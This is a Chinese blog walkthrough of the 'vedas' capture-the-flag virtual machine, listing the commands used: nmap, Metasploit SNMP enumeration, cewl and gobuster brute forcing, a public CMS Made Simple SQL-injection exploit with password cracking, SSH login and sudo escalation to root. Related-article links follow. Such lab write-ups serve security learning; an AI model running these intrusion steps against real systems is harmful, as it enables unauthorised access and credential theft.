vedas靶机(吠陀)

最新推荐文章于 2024-07-23 16:23:28 发布
最新推荐文章于 2024-07-23 16:23:28 发布
阅读量237 收藏 1
点赞数 1
分类专栏: Walkthrough系列 文章标签: python 开发语言 web php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127735185
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:0gp0

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机开放端口和服务情况

2.查看网页

3.用gobuster扫描网站目录,没有利用信息

4.用nmap查询网站是否开启udp

nmap 192.168.1.102 -sU

漏洞利用

1.开启msf工具,执行以下命令:

search snmp
use auxiliary/scanner/snmp/snmp_enum
set rhost 192.168.1.102
run

成功得到一部分root 分密码!

Way to Root:1 (0e462097431)

2.用cewl对网站进行字典收集

cewl http://192.168.1.102 -w dict.txt

3.收集成功后用gobuster进行目录扫描,成功爆破出一个kashyapa目录

gobuster dir -u http://192.168.1.102 \ -w ~/dict.txt

4.继续使用工具爆破kashyapa

gobuster dir -u http://192.168.1.102/Kashyapa \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

5.登录网址后,发现是一个cms并且有版本号。

6.查询后,有一个.py文件存在sql注入

searchsploit cms made simple

7.用cp命令把.py文件复制到当前目录,查看下!

8.根据文件提示,拼接命令

发现报错,应该用python2

9.输入正确后,提示少模块,百度下面的网址,下载解压即可。

Python termcolor项目安装包(第三方库)下载详情页面 - PyPI - Python中文网

gzip -d termcolor-1.1.0.tar.gz
tar -xvf termcolor-1.1.0.tar
cd termcolor-1.1.0
python2 setup.py install

10.一切准备就绪后,回车 等好久........用户名密码就出来了。

python2 46635.py -u http://192.168.1.102/Kashyapa/ --crack -w /usr/share/wordlists/rockyou.txt

atri anasuya

11.登录进去后,发现第二个分密码!!!

第二个分密码 906509019

权限提升

1.用爆破出的用户名密码,登录ssh

atri anasuya

2.在opt目录下有第三个分密码 562988736854

3.把所以密码拼接到一块,用MD5网站解密即可!!!

0e462097431906509019562988736854

4.本来想着这是root密码240610708 ,其实不然是vedas的密码

5.sudo -l 后发现能执行任意命令。

6.提权成功后,进入root目录,成功拿下!!!

魏钦6666
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TensorFlow2.6的离线安装所需的全部依赖包
03-15
TensorFlow2.0以后的版本有了质的飞跃,非常值得学习使用。但是TensorFlow的离线安装非常痛苦,所需的依赖包众多,为了给大家省事,这个压缩包包含了64位Windows下Python3.8对应的TensorFlow2.6所需的所有whl文件,可以实现离线安装,按照顺序pip install即可。
TensorFlow的离线安装
weixin_30872337的博客
01-18 3211
主要通过whl方式进行配置。 1.1 Whl文件下载地址: https://www.lfd.uci.edu/~gohlke/pythonlibs/ 注意:必须安装numpy-mkl,替代原有的numpy,安装时会自动卸载原版本。 共下载三个文件: numpy-1.16.0+mkl-cp37-cp37m-win_amd64.whl protobuf-3....
pip安装termcolor失败解决方法
B1aK2的博客
03-25 2348
原文链接 到该网站下载文件:termcolor1.1.0‑py2.py3‑none‑any.whl 下载完成之后使用命令pip3 install termcolor-1.1.0-py2.py3-none-any.whl安装即可。
vedas靶机渗透攻略
weixin_47311099的博客
01-13 783
信息收集 nmap扫描 nmap -sC -sV 192.168.93.0/24 -p- ​ 目标192.168.93.135 开放22ssh 80http 网站信息收集 首页没啥东西 目录爆破也没啥,22端口爆破太费劲… ​ 扫描udp协议 tcp没思路,扫扫udp nmap -sU -sV 192.168.93.135 68dhcp没啥用,161snmp倒是有点意思 ​ ​ ​ msf探测snmp信息 search snmp ​ use 25 发现一个flag,并提示去root的方式 一串
python-termcolor-1.1.0-4.el7.noarch.rpm
12-14
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
vedas:10可视化由电力发布的供需绩效数据的应用程序
05-08
昵称=吠陀经由于要按原样读取存储库名称很长,因此就像从背面读取单词的第一个字母一样。 供需能源查看器S <= A <= D <= E <= V 昵称=吠陀经Vdas似乎有一个按原样使用的系统,因此我放置了“ Energy”来...
UFW-Tirukkural「திருக்குறள் - Tirukkural」-crx插件
03-08
这在其他一些名字中也得到了体现,例如泰米尔语(Tamil marai)(泰米尔语吠陀(Tamil Vedas))。 poyyamozhi(永不失败的单词); 和Deiva Nool(神圣文本),该作品的年代可追溯至公元前3世纪至公元前1世纪之间,...
sistema-de-prestamo
04-06
Puede gestionarbóvedas,rutas de cobro,特工,主管,cierres de ruta,históricode pagos,estadísticade agente,gastos报到,perfil de cliente,entre otras cosas。 版本演示 Los datos se borran ...
pip安装termcolor失败解决方法+使用方法
热门推荐
小李的研究生学习日记
10-05 1万+
pip安装termcolor失败解决方法在本文末尾!!!!pip安装termcolor失败解决方法在本文末尾!!!!ANSII Color formatting for output in terminal. 利用termcolor查看log,进行代码调试,清晰标出自己想要查看的部分。
使用pythontermcolor
Cody的笔记本
01-09 8925
原文:http://pypi.python.org/pypi/termcolor termcolor是一个python包,可以改变控制台输出的颜色,支持各种terminal(WINDOWS的cmd.exe除外)。 它支持下列的文字颜色: grey, red, green, yellow, blue, magenta, cyan, white 支持下列的背景高亮: on
python文本颜色处理——termcolor模块
Clichong
01-11 882
文章目录1. 属性配置2. 函数3. 测试代码 用途: ANSII Color formatting for output in terminal. 利用termcolor查看log,进行代码调试,清晰标出自己想要查看的部分。 1. 属性配置 ATTRIBUTES = dict( list(zip([ 'bold', 'dark', '', 'underline',
2020-2-5 Win10下安装tensorflow(含出错解决)
weixin_42555985的博客
02-05 3451
因为学习Deep Learning,所以打算安装tensorflow。 安装之前,最好先看看这个网站。 我的python环境原来是2.7的,安装tensorflow会报错。 UnicodeDecodeError: 'utf8' codec can't decode byte 0xb2 in ...... 出错的是文件__init__.py中的errs.append(text_type(e)) 查...
python-termcolor-1.1.0无法正常安装
JayLee的技术博客
02-02 1349
pip install termcolor 报错,版本大幅度降低 尝试下载1.1安装包 直接安装仍然报错 解压缩后将py文件直接拷贝至D:\python-3.7.9-embed-amd64\Lib\site-packages下,然后pip安装成功
pythontermcolor用法
dideng8675的博客
09-15 2871
termcolorpython中标注文本颜色的库 ANSII Color formatting for output in terminal. 利用termcolor查看log,进行代码调试,清晰标出自己想要查看的部分。 帮助文档 FUNCTIONS colored(text, color=None, on_color=None, attrs=None) Color...
使用Python的Turtle库绘制动态风车
爱写代码的小朋友
07-20 381
python绘制风车
随机数种子的作用
帆的博客
07-23 440
设置随机数种子(random seed)的目的是为了确保随机数生成器在每次运行时产生相同的随机数序列,从而保证实验结果的一致性。随机数种子通过初始化随机数生成器的内部状态,使得在相同的种子值下,随机数生成器每次调用时生成的序列是相同的。
Python如何将字符串连接在一起并使用`join()`方法】
qq_36253366的博客
07-19 443
方法是字符串对象的方法,而不是列表或元组等序列类型的方法。因此,你需要先指定一个用作分隔符的字符串,然后调用这个字符串的。方法将字符串连接在一起,你需要首先确保这些字符串被存储在一个序列类型中(如列表或元组),然后调用这个序列的。方法是一个字符串方法,它用于将序列(如列表、元组等)中的元素以指定的字符连接生成一个新的字符串。列表中的所有字符串元素使用空格作为分隔符连接成一个新的字符串。方法,并将你想要作为分隔符的字符串作为参数传递给。方法,并将包含要连接字符串的序列作为参数传递。
【保姆级教程】跑通YOLOv8-multi-task多任务模型
最新发布
m0_51579041的博客
07-23 33
【保姆级教程】跑通YOLOv8-multi-task多任务模型
Python 中的内存管理有哪些优缺点】
qq_36253366的博客
07-19 433
Python中的内存管理是一个复杂而高效的系统,它通过自动化和抽象化的方式极大地简化了程序员的内存管理负担,但同时也存在一些潜在的缺点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值